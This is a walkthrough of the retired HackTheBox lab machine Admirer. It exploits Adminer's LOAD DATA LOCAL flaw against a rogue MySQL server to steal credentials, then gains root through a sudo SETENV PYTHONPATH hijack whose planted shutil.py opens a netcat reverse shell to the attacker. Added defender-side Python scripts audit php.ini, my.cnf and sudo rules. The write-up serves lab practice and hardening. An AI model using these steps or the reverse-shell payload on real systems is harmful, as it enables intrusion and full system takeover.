HTB Walkthrough: Admirer (retired)
Admirer is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.

Hostname: Admirer | Difficulty Level: Easy | Operating System: Linux
NMAP Scan

We can see ports 22 (ssh), 21 (ftp) and 80 (http) open.
HTTP Enumeration
Browsing to http://10.10.10.187 reveals a web page with images. http://10.10.10.187/robots.txt reveals the entry below:
User-agent: *
# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir
Browsing to http://10.10.10.187/admin-dir/ reveals ‘Permission denied’.
Running gobuster: the folders ‘assets’ and ‘images’ return access denied. contacts.txt reveals email addresses; credentials.txt reveals mail account, FTP and WordPress credentials. A WordPress scan did not reveal anything.
┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ sudo gobuster dir -t 50 --url http://10.10.10.187 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/assets (Status: 301)
/images (Status: 301)
/server-status (Status: 403)

┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ sudo gobuster dir -t 50 --url http://10.10.10.187/admin-dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)

We have FTP open, so let’s try the FTP credentials from ‘admin-dir/credentials.txt’.
┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ ftp 10.10.10.187
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 3405 Dec 02 2019 dump.sql
-rw-r--r-- 1 0 0 5270987 Dec 03 2019 html.tar.gz
226 Directory send OK.

Download both files with the ‘get’ command. Once you gunzip and untar ‘html.tar.gz’, you should see another set of credentials in credentials.txt.

Going through ‘utility-scripts’, it looks like not all PHP files were discovered. Running gobuster again with ‘dirb/big.txt’:
┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
└─$ sudo gobuster dir -t 50 --url http://10.10.10.187/utility-scripts --wordlist /usr/share/wordlists/dirb/big.txt -x php
/adminer.php (Status: 200)
/info.php (Status: 200)
/phptest.php (Status: 200)
Browsing to http://10.10.10.187/utility-scripts/info.php, we get the useful information below, since the page executes phpinfo(); refer to it for web server configuration details:
Linux admirer 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64
Browsing to http://10.10.10.187/utility-scripts/admin_tasks.php reveals a page which executes specific queries. You will get a login page at http://10.10.10.187/utility-scripts/adminer.php. From dump.sql (from FTP) it is evident that it uses MySQL, with host localhost and database admirerdb.
We were unable to log in to http://10.10.10.187/utility-scripts/adminer.php with any of the credentials found so far. Let us verify whether the Adminer UI can reach a database on our Kali machine. MySQL uses port 3306, so open an nc listener on Kali on that port. Enter the Kali IP as the server; everything else can be random, since we are only checking whether Kali is reachable. Once you hit the login button, you should see a connection in nc.
┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ nc -lvnp 3306
listening on [any] 3306 …
connect to [kali ip] from (UNKNOWN) [10.10.10.187] 44662
Let us create our own MySQL database on Kali:
┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ sudo service mysql start
MariaDB [(none)]> Create Database DeleteMe;
MariaDB [(none)]> Create user 'uni123'@'10.10.10.187' IDENTIFIED BY 'DontExploit';
Query OK, 0 rows affected (0.004 sec)
MariaDB [(none)]> GRANT ALL on DeleteMe.* TO 'uni123'@'10.10.10.187';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> FLUSH PRIVILEGES;
Running FLUSH PRIVILEGES reloads the grant tables in the mysql database so the changes take effect without restarting the MySQL service. You will not be able to log in from the box yet: you need to change the bind address from 127.0.0.1 to 0.0.0.0.
┌──(kali㉿kali)-[/etc/mysql/mariadb.conf.d]
└─$ sudo vi 50-server.cnf
Edit the line below in ‘50-server.cnf’ so the server listens on all addresses:
bind-address = 0.0.0.0
Change the firewall rule to allow external connections on 3306:
┌──(kali㉿kali)-[/etc/mysql/mariadb.conf.d]
└─$ ufw allow from 10.10.10.187 to any port 3306

Check if 3306 is open on 0.0.0.0:
┌──(kali㉿kali)-[/etc/mysql/mariadb.conf.d]
└─$ netstat -pano | grep 3306
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - off (0.00/0/0)
Then log in to http://10.10.10.187/utility-scripts/adminer.php with the details below:
MySQL
Server: <Kali IP>
Username: uni123
Password: DontExploit
Database: DeleteMe
Exploitation
Search for “Adminer Exploit” and refer to this article: https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool. We exploit the same vulnerability.
While enumerating ‘utility-scripts/admin_tasks.php’, the line below seemed interesting:
echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
If you try to read ‘admin_tasks.sh’ through the LOAD DATA LOCAL vulnerability, you hit the ‘open_basedir’ restriction. In short, it prevents PHP from accessing any location other than those specified in ‘open_basedir’. It is usually set in an .htaccess file; here we saw the phpinfo() output at http://10.10.10.187/utility-scripts/info.php, where open_basedir was ‘/var/www/html’.
To exploit the ‘LOAD DATA LOCAL’ vulnerability, we first need to create a table ‘test’ with a column ‘file’ of type ‘longtext’.

Enter below query in ‘SQL command’ window of ‘DeleteMe’ database:
load data local infile '/var/www/html/index.php'
into table test
fields terminated by "\n"

Click on ‘select test’ > ‘Select data’ on the left side, below the command window. You will see the query result and a new set of database credentials.

Use these credentials to log in to admirerdb. The same credentials also work for SSH into the server; log in and get the user flag.
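The rogue-server technique above works because the MySQL client (here Adminer’s PHP code) answers the server’s LOAD DATA LOCAL request with a file of the server’s choosing, and open_basedir is what limited which files the client could hand over. As an added example that is not part of the original walkthrough, the Python script below audits php.ini and my.cnf fragments for the settings that bound this risk: mysqli.allow_local_infile and open_basedir on the PHP side, and [client] local-infile for the mysql command-line client. The directive names are real; the sample config texts are constructed for the demonstration and are not the box’s files, and the function names are my own.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample configs (not taken from the box): weak and corrected state.
WEAK_PHP_INI = """
; php.ini fragment, constructed for this example
[mysqli]
mysqli.allow_local_infile = On
[PHP]
; open_basedir left unset
"""

HARDENED_PHP_INI = """
[mysqli]
mysqli.allow_local_infile = Off
[PHP]
open_basedir = /var/www/html:/tmp
"""

WEAK_MY_CNF = """
# my.cnf fragment, constructed for this example
[client]
local-infile
"""

HARDENED_MY_CNF = """
[client]
local-infile = 0
"""

Entry = Tuple[str, str, str]  # (section, key, value)


def parse_ini(text: str) -> List[Entry]:
    """Parse php.ini / my.cnf style text into (section, key, value) triples.
    Comments start with ';' or '#'; keys are lower-cased; a bare 'key' line
    (a flag such as 'local-infile') is stored with value '1'."""
    entries: List[Entry] = []
    section = ""
    for raw in text.splitlines():
        line = re.split(r"[;#]", raw, maxsplit=1)[0].strip()
        if not line:
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            section = m.group(1).strip().lower()
        elif "=" in line:
            key, value = line.split("=", 1)
            entries.append((section, key.strip().lower(), value.strip().strip('"')))
        else:
            entries.append((section, line.lower(), "1"))
    return entries


def lookup(entries: List[Entry], key: str, sections=None) -> Optional[str]:
    """Value of the last occurrence of key (optionally restricted to sections)."""
    hit = None
    for section, k, value in entries:
        if k == key and (sections is None or section in sections):
            hit = value
    return hit


def is_on(value: Optional[str]) -> bool:
    """PHP/MySQL style boolean: 1, On, True, Yes all mean enabled."""
    return value is not None and value.strip().lower() in {"1", "on", "true", "yes"}


def audit_php_ini(text: str) -> List[str]:
    """Flag PHP settings that widen the blast radius of a rogue MySQL server."""
    ini = parse_ini(text)
    findings = []
    if is_on(lookup(ini, "mysqli.allow_local_infile")):
        findings.append("mysqli.allow_local_infile is On: the PHP MySQL client will "
                        "serve LOAD DATA LOCAL file requests from any server it connects to")
    if not lookup(ini, "open_basedir"):
        findings.append("open_basedir is unset: file reads by PHP are not confined to the web root")
    return findings


def audit_my_cnf(text: str) -> List[str]:
    """Flag a command-line MySQL client that honours LOAD DATA LOCAL."""
    ini = parse_ini(text)
    findings = []
    if is_on(lookup(ini, "local-infile", sections={"client", "mysql"})):
        findings.append("[client] local-infile is enabled: the mysql CLI will upload "
                        "local files on a server's LOAD DATA LOCAL request")
    return findings


if __name__ == "__main__":
    for name, text, fn in [("weak php.ini", WEAK_PHP_INI, audit_php_ini),
                           ("hardened php.ini", HARDENED_PHP_INI, audit_php_ini),
                           ("weak my.cnf", WEAK_MY_CNF, audit_my_cnf),
                           ("hardened my.cnf", HARDENED_MY_CNF, audit_my_cnf)]:
        print(name, "->", fn(text) or ["no findings"])
```

On the box the open_basedir value of /var/www/html is exactly what stopped the read of /opt/scripts/admin_tasks.sh; mysqli.allow_local_infile set to Off (the default in current PHP releases) removes the file-upload behaviour altogether, so both settings are worth checking on any host that exposes Adminer or a similar database UI.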
Privilege Escalation
waldo@admirer:~$ sudo -l
[sudo] password for waldo:
Sorry, try again.
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
If you view admin_tasks.sh, none of the paths used in its functions are writable by us. It executes backup.py, which in turn uses shutil’s ‘make_archive’ function [/usr/lib/python3.5/shutil.py]. We can write our own shutil.py with a make_archive function. With the ‘SETENV’ tag shown by ‘sudo -l’, we can set PYTHONPATH to the directory holding our shutil.py (/dev/shm).
import os

# reference method: make_archive(dst, 'gztar', src)
def make_archive(a, b, c):
    os.system('nc <kali ip> 8000 -e "/bin/bash"')
Once shutil.py is created, allow the connection from 10.10.10.187 on the port mentioned in the script (8000).
┌──(kali㉿kali)-[~/…/HTB/Admirer/html/utility-scripts]
└─$ sudo ufw allow from 10.10.10.187 to any port 8000
Open a netcat session on port 8000 in kali.
┌──(kali㉿kali)-[~/…/HTB/Admirer/html/utility-scripts]
└─$ nc -lvnp 8000
Now run ‘/opt/scripts/admin_tasks.sh’ via sudo with PYTHONPATH set, select option ‘6’, and you will get a reverse shell with root privileges and the root flag.
waldo@admirer:/dev/shm$ sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
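The weakness in this escalation is the combination of a SETENV sudo rule and a script that invokes an interpreter whose module search path is controlled by an environment variable. As an added defender-side example, not part of the original walkthrough, the Python script below parses ‘sudo -l’ output in the format shown above (the sample text is constructed from that output, with one extra made-up NOPASSWD rule so there is a non-SETENV entry to compare against) and lists the commands carrying SETENV. It then checks the mitigation of running Python with -I (isolated mode, which ignores PYTHONPATH) by writing a harmless stub module into a temporary directory and seeing whether a child interpreter picks it up. Function names are my own.

```python
import os
import re
import subprocess
import sys
import tempfile
from typing import Dict, List

# Constructed copy of the walkthrough's `sudo -l` output plus one made-up rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# "(runas) TAG: TAG: command" as printed by sudo -l
RULE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Return the command rules listed after 'may run the following commands'."""
    rules: List[Dict[str, object]] = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE.match(line.strip())
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            rules.append({"runas": m.group("runas"), "tags": tags, "cmd": m.group("cmd")})
    return rules


def setenv_rules(text: str) -> List[str]:
    """Commands a user may run with SETENV: env_reset no longer protects them,
    so interpreter search-path variables such as PYTHONPATH reach the target."""
    return [r["cmd"] for r in parse_sudo_l(text) if "SETENV" in r["tags"]]


def pythonpath_is_honoured(isolated: bool) -> bool:
    """Does a python child process import a module from PYTHONPATH?
    Writes a benign stub named like the stdlib module shutil into a temp dir,
    points PYTHONPATH at it and reports whether that stub won the import.
    With isolated=True the child runs with -I, which ignores PYTHONPATH."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "shutil.py"), "w") as f:
            f.write("STUB = True\n")  # marker only, nothing executed
        env = dict(os.environ, PYTHONPATH=tmp)
        args = [sys.executable] + (["-I"] if isolated else []) + \
               ["-c", "import shutil; print(getattr(shutil, 'STUB', False))"]
        out = subprocess.run(args, env=env, capture_output=True, text=True, check=True)
        return out.stdout.strip() == "True"


if __name__ == "__main__":
    print("SETENV rules:", setenv_rules(SAMPLE_SUDO_L))
    print("PYTHONPATH honoured without -I:", pythonpath_is_honoured(isolated=False))
    print("PYTHONPATH honoured with -I:", pythonpath_is_honoured(isolated=True))
```

Removing SETENV from the rule, or having backup.py invoked with python3 -I, closes the path this walkthrough uses; the isolated check above returns False on any Python 3.4 or later because -I implies -E, which drops PYTHONPATH.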